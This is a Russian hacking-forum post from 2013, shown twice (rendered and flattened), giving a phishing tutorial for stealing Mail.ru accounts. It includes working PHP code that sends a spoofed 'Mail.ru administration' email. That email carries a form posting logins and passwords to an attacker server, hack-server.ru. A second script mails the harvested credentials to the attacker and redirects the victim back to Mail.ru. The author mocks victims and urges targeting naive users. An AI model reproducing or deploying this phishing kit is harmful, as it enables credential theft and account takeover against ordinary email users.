Воруем почту с помощью письма - Хакерский софт и услуги. Программирование. Взлом. Форум сайта

22ev · 05.02.2013, 15:12

В этой статье я расскажу, как украсть электронную почту путём социальной инженерии, проще говоря, с помощью поддельного письма. Почтовые серверы постоянно совершенствуются, дырки в них латаются, но этот способ, чувствую, будет работать вечно, ибо не перевелись ещё на Руси дураки. В то же время не забываем про статьи 272 и 138, они всё ещё в действии. Но, к делу!

Для этого способа нам не понадобится никаких технических и программных средств – только прямые руки и голова. Смысл взлома прост – пользователь получает письмо, якобы от администрации почтового сервера с просьбой ввести в форме свои логин и пароль, поскольку «меняется оборудование». После того, как пользователь нажал кнопку отправить, все данные перелетают на другой сервер, после чего пользователь перенаправляется на mail.ru.

Самое главное – подделать письмо так, чтобы пользователь поверил, что оно настоящее. Для этого подделаем ящик [Ссылки могут видеть только зарегистрированные пользователи. ], а само письмо должно содержать фразы типа «приносим свои извинения за доставленные неудобства».
Делаем письмо:

PHP код:

<?php

$subject="Внимание! Перенос вашего аккаунта на новый сервер!";
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="From: Администрация Mail.Ru <[Ссылки могут видеть только зарегистрированные пользователи. ]>\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="<body>

<table width=100% height=40 cellpadding=0 cellspacing=0 class=blue  bgcolor='#00468C'>

<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>

<td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>

<td width=100%> </td>

<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>

</table>

<br>

<b>Уважаемый пользователь [Ссылки могут видеть только зарегистрированные пользователи. ]!</b><br>

От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение

вам некоторых неудобств.

В связи со сменой нашего оборудования на более новое нам нужно

перенести часть аккаунтов на новое оборудование.

Соответственно просим повторно прислать некоторую информацию о своем аккаунте.

Это нужно для предотвращения всякого рода ошибок и неточностей.<br>

<b><font color='#ff0000'>В противном случае Вы можете лишиться своего

почтового ящика!</font></b><br><br>

<b>Заполните нижеприведенную форму:</b>

<form method='post' action='http://hack-server.ru/form.php'>

<table width='400px' cellpadding=0 cellspacing=0>

<tr><td><b>Ваш Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr>

<tr><td><b>Ваш Пароль: </b></td><td><input type='password' name='pass'></td></tr>

<tr><td><b>Подтвердите Ваш пароль: </b></td><td><input type='password' name='pass2'></td></tr>

<tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr>

<tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr>

</table>

<input type='submit' value='Отправить'>

</form>

Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>

С уважением, администрация Mail.ru

<br><br><br><br><br></body>";
mail('[Ссылки могут видеть только зарегистрированные пользователи. ]', $subject, $msg, $header);?>

Пользователь получает примерно такое письмо:

Наивный пользователь заполняет все поля и отправляет письмо. А его данные переписываются в скрипт, который Вы напишете в теге form. Берём данные и кидаем лох...пользователя обратно:

PHP код:

<?php

$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";    


 $msg = $_POST['login'];
$subject  = 'логин: '.$_POST['login'].'<br>';
$subject .= 'пароль: '.$_POST['pass'].'<br>';
$subject .= 'имя: '.$_POST['name'].'<br>';
$subject .= 'фамалия: '.$_POST['family'];    


 mail("[Ссылки могут видеть только зарегистрированные пользователи. ]", $msg, $subject, $header);
$location = $_SERVER['HTTP_REFERER'];
header("Location: http://win.mail.ru/cgi-bin/start?top=1");
?>

Если кто-то ещё не понял, то нам необходим сервак, с которого будем отправлять "письмо". Сервер должен поддерживать РНР и иметь бесплатный хостинг Радость

. Ссылок не даю, а то совсем нечестно будет. Поищите, есть такие, есть. И ещё - способ довольно простой, так что ищите пользователей понаивнее. Удачи!

05.02.2013, 15:12	#1
22ev Залётный Регистрация: 04.02.2013 Сообщений: 1	Воруем почту с помощью письма В этой статье я расскажу, как украсть электронную почту путём социальной инженерии, проще говоря, с помощью поддельного письма. Почтовые серверы постоянно совершенствуются, дырки в них латаются, но этот способ, чувствую, будет работать вечно, ибо не перевелись ещё на Руси дураки. В то же время не забываем про статьи 272 и 138, они всё ещё в действии. Но, к делу! Для этого способа нам не понадобится никаких технических и программных средств – только прямые руки и голова. Смысл взлома прост – пользователь получает письмо, якобы от администрации почтового сервера с просьбой ввести в форме свои логин и пароль, поскольку «меняется оборудование». После того, как пользователь нажал кнопку отправить, все данные перелетают на другой сервер, после чего пользователь перенаправляется на mail.ru. Самое главное – подделать письмо так, чтобы пользователь поверил, что оно настоящее. Для этого подделаем ящик [Ссылки могут видеть только зарегистрированные пользователи. ], а само письмо должно содержать фразы типа «приносим свои извинения за доставленные неудобства». Делаем письмо: PHP код: <?php $subject="Внимание! Перенос вашего аккаунта на новый сервер!"; $header="Content-type: text/html; charset=windows-1251 \r\n"; $header.="From: Администрация Mail.Ru <[Ссылки могут видеть только зарегистрированные пользователи. ]>\r\n"; $header.="Subject: $subject \r\n"; $header.="Content-type: text/html; charset=windows-1251 \r\n"; $msg="<body> <table width=100% height=40 cellpadding=0 cellspacing=0 class=blue bgcolor='#00468C'> <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td> <td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td> <td width=100%> </td> <td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td> </table> <br> <b>Уважаемый пользователь [Ссылки могут видеть только зарегистрированные пользователи. ]!</b><br> От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение вам некоторых неудобств. В связи со сменой нашего оборудования на более новое нам нужно перенести часть аккаунтов на новое оборудование. Соответственно просим повторно прислать некоторую информацию о своем аккаунте. Это нужно для предотвращения всякого рода ошибок и неточностей.<br> <b><font color='#ff0000'>В противном случае Вы можете лишиться своего почтового ящика!</font></b><br><br> <b>Заполните нижеприведенную форму:</b> <form method='post' action='http://hack-server.ru/form.php'> <table width='400px' cellpadding=0 cellspacing=0> <tr><td><b>Ваш Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr> <tr><td><b>Ваш Пароль: </b></td><td><input type='password' name='pass'></td></tr> <tr><td><b>Подтвердите Ваш пароль: </b></td><td><input type='password' name='pass2'></td></tr> <tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr> <tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr> </table> <input type='submit' value='Отправить'> </form> Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br> С уважением, администрация Mail.ru <br><br><br><br><br></body>"; mail('[Ссылки могут видеть только зарегистрированные пользователи. ]', $subject, $msg, $header);?> Пользователь получает примерно такое письмо: Наивный пользователь заполняет все поля и отправляет письмо. А его данные переписываются в скрипт, который Вы напишете в теге form. Берём данные и кидаем лох...пользователя обратно: PHP код: <?php $header="Content-type: text/html; charset=windows-1251 \r\n"; $header.="Content-type: text/html; charset=windows-1251 \r\n"; $msg = $_POST['login']; $subject = 'логин: '.$_POST['login'].'<br>'; $subject .= 'пароль: '.$_POST['pass'].'<br>'; $subject .= 'имя: '.$_POST['name'].'<br>'; $subject .= 'фамалия: '.$_POST['family']; mail("[Ссылки могут видеть только зарегистрированные пользователи. ]", $msg, $subject, $header); $location = $_SERVER['HTTP_REFERER']; header("Location: http://win.mail.ru/cgi-bin/start?top=1"); ?> Если кто-то ещё не понял, то нам необходим сервак, с которого будем отправлять "письмо". Сервер должен поддерживать РНР и иметь бесплатный хостинг. Ссылок не даю, а то совсем нечестно будет. Поищите, есть такие, есть. И ещё - способ довольно простой, так что ищите пользователей понаивнее. Удачи!

Опции темы
Версия для печати
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид